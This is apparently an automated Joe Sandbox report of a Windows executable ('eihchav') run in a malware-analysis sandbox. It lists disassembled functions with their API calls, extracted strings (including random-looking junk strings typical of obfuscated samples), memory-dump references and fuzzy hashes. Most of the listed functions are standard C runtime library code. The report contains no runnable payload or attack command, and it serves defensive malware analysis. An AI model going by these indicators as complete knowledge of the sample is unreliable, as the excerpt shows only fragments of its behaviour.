GetConsoleAliasExesA.KERNEL32(?,00000000), ref: 004013D3
EnumDateFormatsW.KERNEL32(00000000,00000000,00000000), ref: 004013DF
CreateNamedPipeA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004013F5
SetFileShortNameW.KERNEL32(00000000,00000000), ref: 004013FF
SetProcessShutdownParameters.KERNEL32(00000000,00000000), ref: 00401409
GetTimeFormatA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040141B
GetModuleFileNameW.KERNEL32(00000000,00000000,00000000), ref: 00401427
TlsSetValue.KERNEL32(00000000,00000000), ref: 0040142D
SetVolumeMountPointW.KERNEL32(00000000,?), ref: 0040143C
GetEnvironmentVariableA.KERNEL32(00000000,?,00000000), ref: 0040144D
SetCalendarInfoW.KERNEL32(00000000,00000000,00000000,gotarurivocabowixetalakagaxahufijefisosefimazuwuhituwigoveyehucorocoyepep), ref: 0040145E
GetModuleFileNameW.KERNEL32(00000000,?,00000000), ref: 0040146F

Strings

zamuloguwatisofobus, xrefs: 004013C1
gotarurivocabowixetalakagaxahufijefisosefimazuwuhituwigoveyehucorocoyepep, xrefs: 00401453

Memory Dump Source

Source File: 00000027.00000002.4487233140.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000027.00000002.4487153590.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4487412054.000000000040E000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4487736486.000000000043E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4487862913.000000000043F000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4488026722.0000000000443000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4488141469.000000000044F000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_400000_eihchav.jbxd

Similarity

API ID: FileName$CreateFormatModule$AliasCalendarConsoleDateEnumEnvironmentExesFormatsInfoMountNamedNumberObjectParametersPipePointProcessShortShutdownTimeValueVariableVolume
String ID: gotarurivocabowixetalakagaxahufijefisosefimazuwuhituwigoveyehucorocoyepep$zamuloguwatisofobus
API String ID: 3743761972-355902816
Opcode ID: 5627bd046ae1666cfd36e497ead6cc165f59d63a3a085b41ff9b56f1d257c26b
Instruction ID: ee725c894420173f20a28521c692df52ac170885327d7458979d19a182ce65e7
Opcode Fuzzy Hash: 5627bd046ae1666cfd36e497ead6cc165f59d63a3a085b41ff9b56f1d257c26b
Instruction Fuzzy Hash: 8C317F76784314BBF7509BA2DD8AF997764EB08B02F104465F708BA1D0CAF06950CB7D

Function 004033D0 Relevance: 10.6, APIs: 7, Instructions: 74
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DecodePointer.KERNEL32(00443E2C,0040E290,?,?,?,004034D4,?,0043C1B8,0000000C,00403500,?,?,0040399C,0040D8D9,?), ref: 004033E5
DecodePointer.KERNEL32(?,?,?,004034D4,?,0043C1B8,0000000C,00403500,?,?,0040399C,0040D8D9,?), ref: 004033F2
__realloc_crt.LIBCMT ref: 0040342F
__realloc_crt.LIBCMT ref: 00403445
EncodePointer.KERNEL32(00000000,?,?,?,004034D4,?,0043C1B8,0000000C,00403500,?,?,0040399C,0040D8D9,?), ref: 00403457
EncodePointer.KERNEL32(?,?,?,?,004034D4,?,0043C1B8,0000000C,00403500,?,?,0040399C,0040D8D9,?), ref: 0040346B
EncodePointer.KERNEL32(-00000004,?,?,?,004034D4,?,0043C1B8,0000000C,00403500,?,?,0040399C,0040D8D9,?), ref: 00403473

Memory Dump Source

Source File: 00000027.00000002.4487233140.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000027.00000002.4487153590.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4487412054.000000000040E000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4487736486.000000000043E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4487862913.000000000043F000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4488026722.0000000000443000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4488141469.000000000044F000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_400000_eihchav.jbxd

Similarity

API ID: Pointer$Encode$Decode__realloc_crt
String ID:
API String ID: 4108716018-0
Opcode ID: 89fe0d1d2ceca4ac7e35c5f64854b923209340b4f03b29cb2949e359ddeeabe9
Instruction ID: 2cb84a8a248f1c704ed31b969d410d2ae143d87c3ddf2eb88c20de984f4c0adb
Opcode Fuzzy Hash: 89fe0d1d2ceca4ac7e35c5f64854b923209340b4f03b29cb2949e359ddeeabe9
Instruction Fuzzy Hash: 2711E972600215AFDB01AF76ED8085A7BEDFB51321310443BE945FB290EB75EE448B9C

Function 00404074 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__getptd_noexit.LIBCMT ref: 0040407B

Part of subcall function 00405C14: GetLastError.KERNEL32(?,?,004048EC,004031F3,?,?,00402C76,?,?,00401021), ref: 00405C18
Part of subcall function 00405C14: ___set_flsgetvalue.LIBCMT ref: 00405C26
Part of subcall function 00405C14: __calloc_crt.LIBCMT ref: 00405C3A
Part of subcall function 00405C14: DecodePointer.KERNEL32(00000000,?,?,004048EC,004031F3,?,?,00402C76,?,?,00401021), ref: 00405C54
Part of subcall function 00405C14: __initptd.LIBCMT ref: 00405C63
Part of subcall function 00405C14: GetCurrentThreadId.KERNEL32 ref: 00405C6A
Part of subcall function 00405C14: SetLastError.KERNEL32(00000000,?,?,004048EC,004031F3,?,?,00402C76,?,?,00401021), ref: 00405C82

__calloc_crt.LIBCMT ref: 0040409D
__get_sys_err_msg.LIBCMT ref: 004040BB
_strcpy_s.LIBCMT ref: 004040C3
__invoke_watson.LIBCMT ref: 004040D8

Strings

Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 00404088, 004040AB

Memory Dump Source

Source File: 00000027.00000002.4487233140.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000027.00000002.4487153590.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4487412054.000000000040E000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4487736486.000000000043E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4487862913.000000000043F000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4488026722.0000000000443000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4488141469.000000000044F000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_400000_eihchav.jbxd

Similarity

API ID: ErrorLast__calloc_crt$CurrentDecodePointerThread___set_flsgetvalue__get_sys_err_msg__getptd_noexit__initptd__invoke_watson_strcpy_s
String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
API String ID: 69636372-798102604
Opcode ID: f8c1622f847cd41dc825cc8429334fb613d8da8a375c82c01b0cad83c0a18197
Instruction ID: 37372fcaa6264d988ca6bfe18943687c80e0c4479773ad4bbbf24e5db921d2ee
Opcode Fuzzy Hash: f8c1622f847cd41dc825cc8429334fb613d8da8a375c82c01b0cad83c0a18197
Instruction Fuzzy Hash: 29F0F0F260431067EA34392A5C8192B768CCBC0728B10483FFF09B72C2E93E9C4041EE

Function 00406BA3 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 23
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__getptd.LIBCMT ref: 00406BC4

Part of subcall function 00405C8D: __getptd_noexit.LIBCMT ref: 00405C90
Part of subcall function 00405C8D: __amsg_exit.LIBCMT ref: 00405C9D

__getptd.LIBCMT ref: 00406BD5
__getptd.LIBCMT ref: 00406BE3

Strings

csm, xrefs: 00406BBD
RCC, xrefs: 00406BAF
MOC, xrefs: 00406BB6

Memory Dump Source

Source File: 00000027.00000002.4487233140.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000027.00000002.4487153590.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4487412054.000000000040E000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4487736486.000000000043E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4487862913.000000000043F000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4488026722.0000000000443000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4488141469.000000000044F000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_400000_eihchav.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: MOC$RCC$csm
API String ID: 803148776-2671469338
Opcode ID: 8ecf2eeeed4e20ee07344ffd1711ce4d4eff133d1e30a160131708de42a51081
Instruction ID: 8a2cd633cb2861bc694519b041e08bbf0c3c08e2df89b1e629200bcacebe9179
Opcode Fuzzy Hash: 8ecf2eeeed4e20ee07344ffd1711ce4d4eff133d1e30a160131708de42a51081
Instruction Fuzzy Hash: 8EE0E5711046149ED7209B65804576637A4EB48314F1640B7981EDF292E73CE8608E46

Function 00406E55 Relevance: 9.0, APIs: 6, Instructions: 49
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__CreateFrameInfo.LIBCMT ref: 00406E7D

Part of subcall function 00403EBB: __getptd.LIBCMT ref: 00403EC9
Part of subcall function 00403EBB: __getptd.LIBCMT ref: 00403ED7

__getptd.LIBCMT ref: 00406E87

Part of subcall function 00405C8D: __getptd_noexit.LIBCMT ref: 00405C90
Part of subcall function 00405C8D: __amsg_exit.LIBCMT ref: 00405C9D

__getptd.LIBCMT ref: 00406E95
__getptd.LIBCMT ref: 00406EA3
__getptd.LIBCMT ref: 00406EAE
_CallCatchBlock2.LIBCMT ref: 00406ED4

Part of subcall function 00403F60: __CallSettingFrame@12.LIBCMT ref: 00403FAC

Part of subcall function 00406F7B: __getptd.LIBCMT ref: 00406F8A
Part of subcall function 00406F7B: __getptd.LIBCMT ref: 00406F98

Memory Dump Source

Source File: 00000027.00000002.4487233140.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000027.00000002.4487153590.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4487412054.000000000040E000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4487736486.000000000043E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4487862913.000000000043F000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4488026722.0000000000443000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4488141469.000000000044F000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_400000_eihchav.jbxd

Similarity

API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
String ID:
API String ID: 1602911419-0
Opcode ID: d333959b915fd8e1c0de2bbeecd09f1762429139ffca88642f3ae91fcbc7b69d
Instruction ID: f4ff0da73481029c5499c7a5202893000d10d4cc2dbb847b80b5ec56fdd99133
Opcode Fuzzy Hash: d333959b915fd8e1c0de2bbeecd09f1762429139ffca88642f3ae91fcbc7b69d
Instruction Fuzzy Hash: 5111DA71C04709DFEB00EFA5D445BAE7BB0FF08315F10806AF815A7291DB789A159F54

Function 00408388 Relevance: 9.0, APIs: 6, Instructions: 47
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__getptd.LIBCMT ref: 00408394

Part of subcall function 00405C8D: __getptd_noexit.LIBCMT ref: 00405C90
Part of subcall function 00405C8D: __amsg_exit.LIBCMT ref: 00405C9D

__amsg_exit.LIBCMT ref: 004083B4
__lock.LIBCMT ref: 004083C4
InterlockedDecrement.KERNEL32(?), ref: 004083E1
_free.LIBCMT ref: 004083F4
InterlockedIncrement.KERNEL32(02182B00), ref: 0040840C

Memory Dump Source

Source File: 00000027.00000002.4487233140.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000027.00000002.4487153590.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4487412054.000000000040E000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4487736486.000000000043E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4487862913.000000000043F000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4488026722.0000000000443000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4488141469.000000000044F000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_400000_eihchav.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
String ID:
API String ID: 3470314060-0
Opcode ID: 9c95964594f11b1e78af7126a55ab338d3c48414ecb463209b489f9f02392a2e
Instruction ID: be03bcebc997c338deb4113661e8592eb7893f85a970011884610e18a9bd654e
Opcode Fuzzy Hash: 9c95964594f11b1e78af7126a55ab338d3c48414ecb463209b489f9f02392a2e
Instruction Fuzzy Hash: D701ED31A01A22DBC720AF26990635E7360FB84B14F00003FE854B72D2CF7D59009BDE

Function 00402160 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 104
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040217A

Part of subcall function 004026B3: std::exception::exception.LIBCMT ref: 004026C8
Part of subcall function 004026B3: __CxxThrowException@8.LIBCMT ref: 004026DD
Part of subcall function 004026B3: std::exception::exception.LIBCMT ref: 004026EE

std::_Xinvalid_argument.LIBCPMT ref: 004021B7

Part of subcall function 00402666: std::exception::exception.LIBCMT ref: 0040267B
Part of subcall function 00402666: __CxxThrowException@8.LIBCMT ref: 00402690
Part of subcall function 00402666: std::exception::exception.LIBCMT ref: 004026A1

_memmove.LIBCMT ref: 00402218

Strings

invalid string position, xrefs: 00402175
string too long, xrefs: 004021B2

Memory Dump Source

Source File: 00000027.00000002.4487233140.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000027.00000002.4487153590.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4487412054.000000000040E000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4487736486.000000000043E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4487862913.000000000043F000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4488026722.0000000000443000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4488141469.000000000044F000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_400000_eihchav.jbxd

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_$_memmove
String ID: invalid string position$string too long
API String ID: 1615890066-4289949731
Opcode ID: 567644979d843288a1ca0f560bd2eb7615e20529f5f63bcf18b1406d7c0d9c96
Instruction ID: b726f4158dc92675a86be445a4642430293383e093db2d13567e6ff6a983de5c
Opcode Fuzzy Hash: 567644979d843288a1ca0f560bd2eb7615e20529f5f63bcf18b1406d7c0d9c96
Instruction Fuzzy Hash: 7F31B6323002149BD7219A9CEE84B5AF3A9EBA1764F20057FF541EB3C1D6F59D4183A9

Function 00407202 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBCMT ref: 00407215

Part of subcall function 00407170: ___BuildCatchObjectHelper.LIBCMT ref: 004071A6

_UnwindNestedFrames.LIBCMT ref: 0040722C
___FrameUnwindToState.LIBCMT ref: 0040723A

Strings

csm, xrefs: 00407204
csm, xrefs: 00407211, 00407226, 00407239, 00407257, 00407267

Memory Dump Source

Source File: 00000027.00000002.4487233140.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000027.00000002.4487153590.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4487412054.000000000040E000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4487736486.000000000043E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4487862913.000000000043F000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4488026722.0000000000443000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4488141469.000000000044F000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_400000_eihchav.jbxd

Similarity

API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
String ID: csm$csm
API String ID: 2163707966-3733052814
Opcode ID: 429dfd9f1cdae758d526fcbba669eded09446f82c318ba394456cffaf76e7554
Instruction ID: 9d33cda1630c614c6b8baaf9185435334ebf2647e1999c875cfe5a2f0f929500
Opcode Fuzzy Hash: 429dfd9f1cdae758d526fcbba669eded09446f82c318ba394456cffaf76e7554
Instruction Fuzzy Hash: EC014F35404109BBDF126F51CC45E9B3F6AFF08344F10402AFD18251A1D739E9B1DBA5

Function 00403938 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 00403952

Part of subcall function 004040DE: __FF_MSGBANNER.LIBCMT ref: 004040F7
Part of subcall function 004040DE: __NMSG_WRITE.LIBCMT ref: 004040FE
Part of subcall function 004040DE: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,004044D6,00000000,00000001,00000000,?,0040577D,00000018,0043C238,0000000C,0040580D), ref: 00404123

std::exception::exception.LIBCMT ref: 00403987
std::exception::exception.LIBCMT ref: 004039A1
__CxxThrowException@8.LIBCMT ref: 004039B2

Strings

,>D, xrefs: 00403965

Memory Dump Source

Source File: 00000027.00000002.4487233140.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000027.00000002.4487153590.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4487412054.000000000040E000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4487736486.000000000043E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4487862913.000000000043F000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4488026722.0000000000443000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4488141469.000000000044F000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_400000_eihchav.jbxd

Similarity

API ID: std::exception::exception$AllocException@8HeapThrow_malloc
String ID: ,>D
API String ID: 1414122017-4267898978
Opcode ID: c563713c882f5ce4ac6a8fb971809998b5ed84bb97ba5090a5cd601f70179b06
Instruction ID: d5265356af2bd35e749b9d337d3430b3e9a834ab04ff5656c26778cf4cf9b054
Opcode Fuzzy Hash: c563713c882f5ce4ac6a8fb971809998b5ed84bb97ba5090a5cd601f70179b06
Instruction Fuzzy Hash: ECF0D675800109AACB00FF56DC46A5D7FA96B41B29B24443FF405B61D1CBF89B46974C

Function 0040354F Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 0040355D

Part of subcall function 004040DE: __FF_MSGBANNER.LIBCMT ref: 004040F7
Part of subcall function 004040DE: __NMSG_WRITE.LIBCMT ref: 004040FE
Part of subcall function 004040DE: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,004044D6,00000000,00000001,00000000,?,0040577D,00000018,0043C238,0000000C,0040580D), ref: 00404123

_free.LIBCMT ref: 00403570

Memory Dump Source

Source File: 00000027.00000002.4487233140.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000027.00000002.4487153590.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4487412054.000000000040E000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4487736486.000000000043E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4487862913.000000000043F000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4488026722.0000000000443000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4488141469.000000000044F000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_400000_eihchav.jbxd

Similarity

API ID: AllocHeap_free_malloc
String ID:
API String ID: 2734353464-0
Opcode ID: d1e8b3204e4a6df3a67db14c6d8cd5732c45cf5bda7c9f858878bec0112749d3
Instruction ID: dc83b90e6fb43b5c24848a5f74a511594923413cb778fb3891e3a705d38e000c
Opcode Fuzzy Hash: d1e8b3204e4a6df3a67db14c6d8cd5732c45cf5bda7c9f858878bec0112749d3
Instruction Fuzzy Hash: E511C876810515BBCB213F76AC04A5A3F9C9F807A6B20483BF549BA2E0DA7C8B51D65C

Function 004080EC Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 004080F8

Part of subcall function 00405C8D: __getptd_noexit.LIBCMT ref: 00405C90
Part of subcall function 00405C8D: __amsg_exit.LIBCMT ref: 00405C9D

__getptd.LIBCMT ref: 0040810F
__amsg_exit.LIBCMT ref: 0040811D
__lock.LIBCMT ref: 0040812D
__updatetlocinfoEx_nolock.LIBCMT ref: 00408141

Memory Dump Source

Source File: 00000027.00000002.4487233140.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000027.00000002.4487153590.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4487412054.000000000040E000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4487736486.000000000043E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4487862913.000000000043F000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4488026722.0000000000443000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4488141469.000000000044F000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_400000_eihchav.jbxd

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: 5d2fdda8b2c337c15f5e45f0e314abe087f617901cd2a1ebb74c29d25e3ddec8
Instruction ID: 600e316c4c0b515e5921c31e0b4557263661f3c2bedec43e289914c6551e9f3e
Opcode Fuzzy Hash: 5d2fdda8b2c337c15f5e45f0e314abe087f617901cd2a1ebb74c29d25e3ddec8
Instruction Fuzzy Hash: 7EF06232D05B10DAE620BB7A990675A27909F00728F11413FE4947B2D2CF7C49519B9E

Function 0040AD75 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 0040AD9B

Part of subcall function 0040ABC7: __fltout2.LIBCMT ref: 0040ABF2

__cftog_l.LIBCMT ref: 0040ADC1
__cftoe_l.LIBCMT ref: 0040ADF3

Memory Dump Source

Source File: 00000027.00000002.4487233140.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000027.00000002.4487153590.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4487412054.000000000040E000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4487736486.000000000043E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4487862913.000000000043F000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4488026722.0000000000443000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4488141469.000000000044F000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_400000_eihchav.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction ID: ddfa4d8130d636f3ef40e1cea94614215a6fa8e11de1469be39291c4408a14f6
Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction Fuzzy Hash: D111433204024ABBCF125E85CC05CEE3F23BF18355B598526FA1869571D73BC9B1BB86

Function 004067DA Relevance: 6.0, APIs: 4, Instructions: 41COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32(00000000,00403AA0), ref: 004067DD
__malloc_crt.LIBCMT ref: 0040680C
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00406819

Memory Dump Source

Source File: 00000027.00000002.4487233140.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000027.00000002.4487153590.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4487412054.000000000040E000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4487736486.000000000043E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4487862913.000000000043F000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4488026722.0000000000443000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4488141469.000000000044F000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_400000_eihchav.jbxd

Similarity

API ID: EnvironmentStrings$Free__malloc_crt
String ID:
API String ID: 237123855-0
Opcode ID: 4c2f1ac6bb7f8133571ce24b03f845ef82e5c12d60eed84597f6926d5cad50ed
Instruction ID: c101f1b95c54b5ec221fdb71957a5b0ebd14c395316be2ddd09db82d21e96add
Opcode Fuzzy Hash: 4c2f1ac6bb7f8133571ce24b03f845ef82e5c12d60eed84597f6926d5cad50ed
Instruction Fuzzy Hash: 2DF0E977501010AADB207735BC4985B1668DAD532830B843BF506E7284F9388D5182A9

Function 00402060 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 004020D5
_memmove.LIBCMT ref: 00402126

Part of subcall function 00402160: std::_Xinvalid_argument.LIBCPMT ref: 0040217A

Strings

string too long, xrefs: 004020D0

Memory Dump Source

Source File: 00000027.00000002.4487233140.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000027.00000002.4487153590.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4487412054.000000000040E000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4487736486.000000000043E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4487862913.000000000043F000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4488026722.0000000000443000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4488141469.000000000044F000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_400000_eihchav.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$_memmove
String ID: string too long
API String ID: 2168136238-2556327735
Opcode ID: b62e8e4e5b6e4aa08ba93a625368388b72582cc6314c21ca3f3c4be498d51de9
Instruction ID: 68234aa450a1a40b984ca5c3b2ab52dbda57fca9de6b351a044f925e1d1c9fff
Opcode Fuzzy Hash: b62e8e4e5b6e4aa08ba93a625368388b72582cc6314c21ca3f3c4be498d51de9
Instruction Fuzzy Hash: 5E31D4323006105BD7249E5CEA8892BF7E9EB96724B20053FF681DB7D1C7F69C4083A8

Function 00402250 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00402266

Part of subcall function 004026B3: std::exception::exception.LIBCMT ref: 004026C8
Part of subcall function 004026B3: __CxxThrowException@8.LIBCMT ref: 004026DD
Part of subcall function 004026B3: std::exception::exception.LIBCMT ref: 004026EE

_memmove.LIBCMT ref: 0040229F

Strings

invalid string position, xrefs: 00402261

Memory Dump Source

Source File: 00000027.00000002.4487233140.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000027.00000002.4487153590.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
